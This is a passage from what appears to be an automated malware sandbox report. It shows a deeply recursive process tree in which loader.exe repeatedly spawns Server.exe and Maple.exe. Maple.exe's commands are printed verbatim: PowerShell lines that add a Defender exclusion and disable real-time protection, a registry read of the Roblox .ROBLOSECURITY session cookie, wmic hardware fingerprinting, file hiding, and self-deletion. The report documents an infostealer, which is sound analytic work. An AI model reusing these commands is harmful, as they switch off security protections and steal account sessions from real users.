                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                      PID:4944
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                  39⤵
                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                  PID:3732
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                    PID:928
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                      PID:3512
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                      40⤵
                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                        41⤵
                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                        PID:1268
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                        41⤵
                                                                                                                                                                                                                                                                                          PID:3088
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                          41⤵
                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                          PID:3780
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                            42⤵
                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                            PID:4516
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                            42⤵
                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                            PID:4724
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                              "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                              43⤵
                                                                                                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                PID:4816
                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                  43⤵
                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                  PID:448
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                  43⤵
                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                  PID:3588
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                  43⤵
                                                                                                                                                                                                                                                                                                    PID:404
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                    "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                    43⤵
                                                                                                                                                                                                                                                                                                      PID:1272
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                      43⤵
                                                                                                                                                                                                                                                                                                        PID:1672
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                        "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                        43⤵
                                                                                                                                                                                                                                                                                                          PID:3172
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                          PID:4768
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                          "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                          • Detects videocard installed
                                                                                                                                                                                                                                                                                                          PID:3088
                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                          PID:516
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                            ping localhost
                                                                                                                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                            PID:3028
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                        42⤵
                                                                                                                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                          PID:3456
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                          43⤵
                                                                                                                                                                                                                                                                                                            PID:4972
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                            43⤵
                                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                                            PID:3984
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                              44⤵
                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                              PID:3064
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                              44⤵
                                                                                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                              PID:2868
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                45⤵
                                                                                                                                                                                                                                                                                                                  PID:4944
                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                  45⤵
                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                  PID:2068
                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                  45⤵
                                                                                                                                                                                                                                                                                                                    PID:3960
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                    45⤵
                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                    PID:4064
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                    45⤵
                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                    PID:1884
                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                    45⤵
                                                                                                                                                                                                                                                                                                                      PID:4512
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                      "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                      45⤵
                                                                                                                                                                                                                                                                                                                        PID:3656
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                        45⤵
                                                                                                                                                                                                                                                                                                                          PID:4964
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                          45⤵
                                                                                                                                                                                                                                                                                                                            PID:3956
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                            PID:3012
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                            "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                                                                                                                            • Detects videocard installed
                                                                                                                                                                                                                                                                                                                            PID:3436
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                            PID:4972
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping localhost
                                                                                                                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                              PID:2456
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                          44⤵
                                                                                                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                                                                                                          PID:4364
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                            PID:3276
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                                                                                                                              PID:4636
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                              45⤵
                                                                                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                                                                                              PID:1656
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                46⤵
                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                PID:3632
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                46⤵
                                                                                                                                                                                                                                                                                                                                  PID:1900
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                  46⤵
                                                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                  PID:2172
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                    47⤵
                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                    PID:5100
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                    47⤵
                                                                                                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                      48⤵
                                                                                                                                                                                                                                                                                                                                        PID:1036
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                        48⤵
                                                                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                        PID:928
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                        48⤵
                                                                                                                                                                                                                                                                                                                                          PID:1084
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                          48⤵
                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                          PID:3456
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                          48⤵
                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                          PID:2440
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                          48⤵
                                                                                                                                                                                                                                                                                                                                            PID:820
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                            "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                                            48⤵
                                                                                                                                                                                                                                                                                                                                              PID:1008
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                              "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                                              48⤵
                                                                                                                                                                                                                                                                                                                                                PID:3356
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                48⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3100
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                  PID:4816
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                  "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                  • Detects videocard installed
                                                                                                                                                                                                                                                                                                                                                  PID:888
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:4912
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                    ping localhost
                                                                                                                                                                                                                                                                                                                                                    49⤵
                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                    PID:848
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                PID:4560
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:1156
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4640
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                    48⤵
                                                                                                                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                                                                                                                    PID:5024
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
                                                                                                                                                                                                                                                                                                                                                      49⤵
                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                      PID:1584
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Maple.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                      49⤵
                                                                                                                                                                                                                                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                      PID:1720
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                        "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                        50⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3780
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                                          "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                          50⤵
                                                                                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                          PID:3172
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                                          50⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3184
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                            PID:3276
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                            PID:1568
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                                                                                                                                                                              PID:456
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                              "wmic.exe" os get Caption
                                                                                                                                                                                                                                                                                                                                                              50⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1008
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                                                                                                                50⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                  "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                  50⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:736
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                    PID:2664
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                    "wmic" path win32_VideoController get name
                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                    • Detects videocard installed
                                                                                                                                                                                                                                                                                                                                                                    PID:628
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
                                                                                                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
